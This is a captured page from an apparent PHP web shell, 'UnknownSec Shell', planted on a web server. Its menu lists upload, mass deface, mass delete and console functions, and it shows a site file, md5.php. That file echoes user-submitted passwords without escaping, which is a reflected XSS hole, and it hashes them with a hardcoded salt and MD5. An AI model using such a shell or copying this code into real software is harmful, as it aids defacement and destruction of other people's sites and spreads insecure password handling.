shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
md5.php
<!doctype html> <html> <head> <meta charset="UTF-8"> <title>MD5</title> </head> <body> <?php if (!isset($_POST['submitBut'])){ echo "<form action='' method='post'> <p>Enter password: <input type='text' name='pass'></p> <p><input type='submit' name='submitBut' value='Submit'></p> </form>"; } else if ($_POST['submitBut'] == 'Submit'){ $salt = 'Mvp3f3UL55VK'; echo "<p>Password: ".$_POST['pass']."</p> <p>Salt: ".$salt."</p> <p>MD5 hash: ".md5($_POST['pass'].$salt)."</p> <form action='' method='post'> <p>Enter another password: <input type='text' name='pass'></p> <p><input type='submit' name='submitBut' value='Submit'></p> </form>"; } ?> </body> </html>
© 2026 UnknownSec